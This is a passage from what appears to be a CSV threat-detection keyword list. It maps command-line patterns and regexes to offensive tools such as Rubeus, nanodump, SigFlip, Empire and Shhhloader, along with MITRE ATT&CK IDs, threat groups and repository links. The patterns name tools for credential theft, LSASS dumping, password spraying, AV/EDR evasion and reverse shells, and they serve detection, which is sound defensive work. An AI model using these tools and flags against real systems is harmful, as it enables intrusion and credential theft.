tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* -sharpweb -Command *",".{0,1000}\s\-sharpweb\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* --shell tcsh exegol*",".{0,1000}\s\-\-shell\stcsh\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* Shell3er.ps1*",".{0,1000}\sShell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "* --shellcode *",".{0,1000}\s\-\-shellcode\s.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "* --shellcode *--dc-ip *",".{0,1000}\s\-\-shellcode\s.{0,1000}\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* --shellcode *--silent*",".{0,1000}\s\-\-shellcode\s.{0,1000}\-\-silent.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* --shellcode --remoteinject*",".{0,1000}\s\-\-shellcode\s\-\-remoteinject.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* shellcode_callback.exe*",".{0,1000}\sshellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - 
T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* shellcode-xor.py*",".{0,1000}\sshellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "* Shhhavoc.py*",".{0,1000}\sShhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "* shodan-api.nse*",".{0,1000}\sshodan\-api\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Shoggoth.exe*",".{0,1000}\sShoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "* --show passwd*",".{0,1000}\s\-\-show\spasswd.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* 
--show_invalid_creds*",".{0,1000}\s\-\-show_invalid_creds.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --shtinkering*",".{0,1000}\s\-\-shtinkering.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* --shuffle-users* --spray*",".{0,1000}\s\-\-shuffle\-users.{0,1000}\s\-\-spray.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* sigflip.*",".{0,1000}\ssigflip\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* sigflip.c *",".{0,1000}\ssigflip\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* SigFlip.exe*",".{0,1000}\sSigFlip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* SigFlip.PE*",".{0,1000}\sSigFlip\.PE.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* sigflip.x64.*",".{0,1000}\ssigflip\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* sigflip.x86.*",".{0,1000}\ssigflip\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* SigLoader *",".{0,1000}\sSigLoader\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* --sign-domain *",".{0,1000}\s\-\-sign\-domain\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --sign-steal *",".{0,1000}\s\-\-sign\-steal\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* Sigwhatever*",".{0,1000}\sSigwhatever.{0,1000}","offensive_tool_keyword","cobaltstrike","Information 
released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "* --silent -obf NixImports -o /tmp/*",".{0,1000}\s\-\-silent\s\-obf\sNixImports\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* --silent-process-exit *",".{0,1000}\s\-\-silent\-process\-exit\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* silenttrinity.*",".{0,1000}\ssilenttrinity\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "* silver * /domain*",".{0,1000}\ssilver\s.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* silver * /ldap *",".{0,1000}\ssilver\s.{0,1000}\s\/ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* silver * /passlastset *",".{0,1000}\ssilver\s.{0,1000}\s\/passlastset\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* silver * /service:*",".{0,1000}\ssilver\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* simpleLoader.c -z execstack*",".{0,1000}\ssimpleLoader\.c\s\-z\sexecstack.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* --single shadow.hashes*",".{0,1000}\s\-\-single\sshadow\.hashes.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* sip-brute.nse*",".{0,1000}\ssip\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-call-spoof.nse*",".{0,1000}\ssip\-call\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-enum-users.nse*",".{0,1000}\ssip\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-log4shell.nse*",".{0,1000}\ssip\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* sip-methods.nse*",".{0,1000}\ssip\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sitadel.py*",".{0,1000}\ssitadel\.py.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* -SiteListFilePath * -B64Pass *",".{0,1000}\s\-SiteListFilePath\s.{0,1000}\s\-B64Pass\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --skip-crawl*",".{0,1000}\s\-\-skip\-crawl.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*- --skippasswordcheck*",".{0,1000}\-\s\-\-skippasswordcheck.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* 
